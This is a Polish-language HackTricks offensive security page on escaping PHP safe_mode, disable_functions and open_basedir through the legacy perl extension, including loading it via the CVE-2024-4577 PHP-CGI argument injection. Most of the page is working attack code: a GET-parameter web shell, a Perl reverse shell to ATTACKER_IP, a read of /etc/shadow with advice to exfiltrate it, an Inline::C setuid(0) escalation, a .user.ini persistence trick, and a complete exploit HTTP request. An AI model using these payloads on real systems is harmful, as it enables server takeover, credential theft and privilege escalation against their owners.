Eksploit omijający Safe_mode rozszerzenia Perl dla PHP

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

Tło

Problem śledzony jako CVE-2007-4596 pochodzi z przestarzałego rozszerzenia perl dla PHP, które osadza pełny interpreter Perla, nie respektując kontroli PHP takich jak safe_mode, disable_functions czy open_basedir. Każdy worker PHP, który załaduje extension=perl.so, uzyskuje nieograniczone eval Perla, więc wykonywanie poleceń pozostaje trywialne nawet gdy wszystkie klasyczne PHP-owe mechanizmy uruchamiania procesów są zablokowane. Mimo że safe_mode zniknął w PHP 5.4, wiele przestarzałych środowisk shared-hostingu i podatnych laboratoriów wciąż go oferuje, więc ten bypass jest nadal przydatny, gdy trafisz na stare panele zarządzania.

Kompatybilność i status pakowania (2025)

  • Ostatnie wydanie PECL (perl-1.0.1, 2013) celuje w PHP ≥5.0; PHP 8+ zwykle nie działa, ponieważ API Zend się zmieniły.
  • PECL jest zastępowany przez PIE, ale starsze stosy wciąż dostarczają PECL/pear. Użyj poniższego procesu na celach PHP 5/7; na nowszym PHP spodziewaj się obniżenia wersji lub przejścia na inną ścieżkę wstrzyknięcia (np. userland FFI).

Budowanie testowalnego środowiska w 2025

  • Pobierz perl-1.0.1 z PECL, skompiluj go dla gałęzi PHP, którą planujesz atakować, i załaduj globalnie (php.ini) lub przez dl() (jeśli dozwolone).
  • Szybka receptura dla laboratorium opartego na Debianie:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Podczas eksploatacji potwierdź dostępność za pomocą var_dump(extension_loaded('perl')); lub print_r(get_loaded_extensions());. Jeśli brak, wyszukaj perl.so lub wykorzystaj zapisywalne wpisy php.ini/.user.ini, by wymusić jego załadowanie.
  • Ponieważ interpreter żyje wewnątrz workera PHP, żadne zewnętrzne binarki nie są potrzebne — filtry egress sieciowe lub czarne listy proc_open nie mają znaczenia.

Łańcuch kompilacji na hoście, gdy phpize jest dostępny

Jeśli phpize i build-essential są obecne na opanowanym hoście, możesz skompilować i rozmieścić perl.so bez wywoływania powłoki systemu operacyjnego:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Jeśli open_basedir jest wymuszony, upewnij się, że umieszczone .user.ini i .so znajdują się w dozwolonej ścieżce; dyrektywa extension= jest nadal respektowana wewnątrz basedir. Proces kompilacji odpowiada opisowi w dokumentacji PHP dotyczącym budowania rozszerzeń PECL.

Oryginalny PoC (NetJackal)

Z http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, nadal przydatne do potwierdzenia, że rozszerzenie odpowiada na eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Modern Payload Enhancements

1. Pełne TTY przez TCP

Wbudowany interpreter może załadować IO::Socket nawet jeśli /usr/bin/perl jest zablokowany:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape Nawet przy open_basedir

Perl ignoruje open_basedir w PHP, więc możesz odczytać dowolne pliki:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Przepuść wyjście przez IO::Socket::INET lub Net::HTTP, aby exfiltrate data bez dotykania deskryptorów zarządzanych przez PHP.

3. Inline Compilation for Privilege Escalation

Jeśli Inline::C jest dostępny systemowo, skompiluj pomocnicze moduły w ramach żądania, bez polegania na PHP-owym ffi lub pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Traktuj Perl jako zestaw narzędzi LOLBAS — np. dump MySQL DSNs nawet jeśli mysqli jest niedostępny:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Nadużycie: Ładowanie perl.so przez PHP-CGI Argument Injection (CVE-2024-4577)

Na instalacjach Windows, które nadal udostępniają PHP-CGI, regresja argument-injection z 2024 (CVE-2024-4577) pozwala przekazać interpreterowi dowolne opcje -d. Oznacza to, że możesz załadować rozszerzenie Perl nawet gdy dl() jest wyłączone, a php.ini jest tylko-do-odczytu:

  • Zbuduj lub wyślij kompatybilny perl.dll/perl.so do katalogu zapisywalnego przez WWW (np. C:\xampp\htdocs\temp\perl.dll).
  • Wyślij pojedyncze żądanie HTTP, które wstrzykuje -d extension=C:\\xampp\\htdocs\\temp\\perl.dll i, w tej samej treści żądania, ładunek oparty na Perlu:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Ponieważ worker PHP teraz osadza Perl przed odczytem body, wszystkie klasyczne kontrole disable_functions/open_basedir są pomijane. Działa to na podatnych stosach Windows/CGI aż do załatania (PHP 8.1.29/8.2.20/8.3.8 i nowsze zamykają regresję). Jeśli open_basedir blokuje ścieżkę DLL, najpierw upuść plik wewnątrz dozwolonego katalogu bazowego lub wykorzystaj istniejącą, ogólnie dostępną ścieżkę DLL dostarczoną przez XAMPP.

Źródła

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks